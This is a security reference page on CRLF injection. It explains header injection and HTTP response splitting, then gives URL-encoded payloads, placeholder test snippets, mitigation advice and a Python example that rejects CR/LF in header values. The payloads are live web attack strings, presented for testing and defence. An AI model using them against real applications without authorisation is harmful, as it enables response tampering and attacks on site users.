# CRLF Injection

#### Description

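CRLF (Carriage Return Line Feed) Injection occurs when an attacker can inject CR (`\r`, URL-encoded `%0D`) and LF (`\n`, URL-encoded `%0A`) characters into HTTP headers. Because CRLF terminates each header line and an empty line ends the header block, this can lead to HTTP response splitting, header injection, or other malicious actions.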

#### Example with Scenario

**Scenario:** A web application takes user input to generate HTTP headers. An attacker can manipulate the input to inject additional headers or split the HTTP response, leading to various attacks.

#### Payloads and Test Cases

**Payloads**

1. **Header Injection:**

   ```
   %0D%0AInjected-Header: injected
   ```
2. **HTTP Response Splitting:**

   ```
   %0D%0AContent-Length: 0%0D%0A%0D%0AHTTP/1.1 200 OK%0D%0AContent-Type: text/html%0D%0A%0D%0A<h1>Injected Content</h1>
   ```

**Test Cases**

1. **Header Injection:**
   * **Payload:**

     ```
     %0D%0AInjected-Header: injected
     ```
   * **Test Case:**

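     ```python
     # sendPayloadToServer and checkForInjectedHeader are placeholders
     # for the test harness's own HTTP helpers.
     # Send payload to the server
     sendPayloadToServer("input=%0D%0AInjected-Header: injected")
     # Verify if the application includes the injected header
     checkForInjectedHeader("Injected-Header", "injected")
     ```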
2. **HTTP Response Splitting:**
   * **Payload:**

     ```
     %0D%0AContent-Length: 0%0D%0A%0D%0AHTTP/1.1 200 OK%0D%0AContent-Type: text/html%0D%0A%0D%0A<h1>Injected Content</h1>
     ```
   * **Test Case:**

     ```python
     # sendPayloadToServer and checkForInjectedContent are placeholders
     # for the test harness's own HTTP helpers.
     # Send payload to the server
     sendPayloadToServer("input=%0D%0AContent-Length: 0%0D%0A%0D%0AHTTP/1.1 200 OK%0D%0AContent-Type: text/html%0D%0A%0D%0A<h1>Injected Content</h1>")
     # Verify if the application splits the HTTP response
     checkForInjectedContent("<h1>Injected Content</h1>")
     ```

#### Mitigation

1. **Input Validation:**
   * Validate and sanitize user input to ensure it does not contain CRLF characters.
   * Implement strict validation rules to reject malicious input.
2. **Use Libraries:**
   * Use libraries and frameworks that automatically handle header encoding and prevent injection.
   * Avoid constructing HTTP headers manually using user input.
3. **Secure Headers:**
   * Set secure HTTP headers to mitigate the impact of potential CRLF injection.
   * Use Content Security Policy (CSP) and other security headers to protect the application.
4. **Error Handling:**
   * Implement proper error handling to avoid revealing header information in error messages.
   * Return generic error messages without disclosing sensitive details.
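
The input-validation and "avoid constructing headers manually" points above, as an added example that is not part of the original page: a hand-built response next to a wrapper that rejects CR, LF and NUL instead of stripping them. The `Content-Language` header and all function names are assumptions; the input is the page's header-injection payload after URL-decoding.

```python
import re
from urllib.parse import unquote

# CR, LF and NUL are invalid in a header field value (RFC 9110, section 5.5).
_FORBIDDEN = re.compile(r"[\r\n\x00]")

def build_response_unsafe(lang):
    """Hand-built response: decoded user input goes straight into a header."""
    head = ("HTTP/1.1 200 OK\r\n"
            f"Content-Language: {lang}\r\n"
            "Content-Length: 2\r\n\r\n")
    return head.encode("latin-1") + b"ok"

def safe_header_value(value):
    """Reject (rather than silently strip) values with CR, LF or NUL."""
    if _FORBIDDEN.search(value):
        raise ValueError("control character in header value")
    return value

def build_response_safe(lang):
    """Same response, but the value is validated before it is used."""
    return build_response_unsafe(safe_header_value(lang))

def header_names(raw):
    """Header names a client would parse from the first response in `raw`."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    return [line.split(":", 1)[0] for line in head.split("\r\n")[1:]]

# Constructed input: the page's payload appended to a normal value, decoded
# the way a web framework decodes a query parameter before the app sees it.
PAYLOAD = unquote("en%0D%0AInjected-Header: injected")

def demo():
    """Return (headers from unsafe build, payload rejected?, clean headers)."""
    unsafe = header_names(build_response_unsafe(PAYLOAD))
    try:
        build_response_safe(PAYLOAD)
        blocked = False
    except ValueError:
        blocked = True
    return unsafe, blocked, header_names(build_response_safe("en"))

if __name__ == "__main__":
    print(demo())
```

The check runs on the decoded value, so it catches the payload regardless of how the CR and LF were encoded on the wire.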
